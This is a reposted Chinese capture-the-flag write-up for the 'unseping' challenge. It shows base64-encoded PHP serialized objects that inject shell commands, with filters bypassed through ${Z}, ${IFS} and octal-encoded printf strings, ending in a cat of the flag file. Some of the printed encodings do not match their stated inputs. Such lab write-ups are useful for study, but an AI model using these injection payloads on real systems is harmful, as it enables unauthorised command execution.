当前位置: 首页 > news >正文

攻防世界-unseping

进入环境

在获得的场景中发现PHP代码并进行分析

编写PHP编码

得到

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozOiJwd2QiO319

将其传入

想执行ls,但是发现被过滤掉了

使用环境变量进行绕过

$a = new ease("ping",array('l${Z}s'));

运行得到

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo2OiJsJHtafXMiO319

再次传入参数

查到了flag_1s_here文件但是被过滤掉了,进行绕过

得到

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319

进行上传

得到flag

flag_831b69012c67b35f.php

进行访问

发现没什么用

上代码

#include<stdio.h>
int main()
{char site[] = "cat flag_ls_here/flag_831b69012c67b35f.php";for (int i = 0; i < sizeof site / sizeof site[0]; i++){printf("\\%o", site[i]);}return 0;
}

运行得到

\143\141\164\040\146\154\141\147\137\154\163\137\150\145\162\145\057\146\154\141\147\055\067\060\061\142\065\147\060\061\062\143\066\067\060\063\065\066\056\160\150\160

构造payload

$a = new
ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));

运行得到

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319

传入参数

得到最后的flag


文章转载自:

http://yVtGNWFk.yprnp.cn
http://FJwyFvRt.yprnp.cn
http://xCWgzu37.yprnp.cn
http://CNqNg2vC.yprnp.cn
http://YVeC2SXV.yprnp.cn
http://YLVXAUF4.yprnp.cn
http://iVUsRPku.yprnp.cn
http://UmHgVmKE.yprnp.cn
http://ju94N5kI.yprnp.cn
http://g5eoPt05.yprnp.cn
http://PFHLO2SY.yprnp.cn
http://ksC5Cbm0.yprnp.cn
http://sOZQRwyn.yprnp.cn
http://jmHw88Py.yprnp.cn
http://UVB1Fajx.yprnp.cn
http://OCX0u1lt.yprnp.cn
http://Jd7cE8kI.yprnp.cn
http://Nc6H7FYc.yprnp.cn
http://5AxUXkuQ.yprnp.cn
http://koxDsVTE.yprnp.cn
http://Boppfpun.yprnp.cn
http://OM48vOgj.yprnp.cn
http://tUZTVXK4.yprnp.cn
http://B8h3Khsw.yprnp.cn
http://fU96gJY0.yprnp.cn
http://5G02aQLL.yprnp.cn
http://YmgVk0m1.yprnp.cn
http://L20UB2SO.yprnp.cn
http://fCNQ7ifF.yprnp.cn
http://tgDghJ9f.yprnp.cn
http://www.dtcms.com/a/228744.html

相关文章:

  • 新版 Xcode 中 CoreData 模型编辑器显示拓扑图功能取消的替代方案
  • Python与数据分析期末复习笔记
  • 数字商城小程序源码,开启便捷电商新体验
  • 高考数学易错考点01 | 临阵磨枪
  • Java高级 | (二十二)Java常用类库
  • C++概率论算法详解:理论基础与实践应用
  • 快速上手pytest
  • 【SAP FICO】在建工程及固定资产
  • [Java 基础]变量,装东西的盒子
  • Linux 下 ChromeDriver 安装
  • Redisson学习专栏(五):源码阅读及Redisson的Netty通信层设计
  • 【分布式技术】KeepAlived高可用架构科普
  • 系统架构设计论文
  • 3.2 HarmonyOS NEXT跨设备任务调度与协同实战:算力分配、音视频协同与智能家居联动
  • P1438 无聊的数列/P1253 扶苏的问题
  • 【自动思考记忆系统】demo (Java版)
  • Day11
  • S1240拨打电话时的工作过程
  • Rust 学习笔记:关于 Cargo 的练习题
  • 如何监测光伏系统中的电能质量问题?分布式光伏电能质量解决方案
  • [Java 基础]选英雄(配置 IDEA)
  • 第十三章 Java基础-特殊处理
  • C++核心编程_ 函数调用运算符重载
  • 构建基于深度学习的人体姿态估计系统 数据预处理到模型训练、评估和部署 _如何利用人体姿态识别估计数据集_数据进行人体姿态估计研究的建议Human3.6M
  • MySQL 8 完整安装指南(Ubuntu 22.04)
  • 【2025RAG最新进展】
  • 数据结构:递归的种类(Types of Recursion)
  • 互联网大厂智能体平台体验笔记字节扣子罗盘、阿里云百炼、百度千帆 、腾讯元器、TI-ONE平台、云智能体开发平台
  • MQTTX连接阿里云的物联网配置
  • 问题七、isaacsim中添加IMU传感器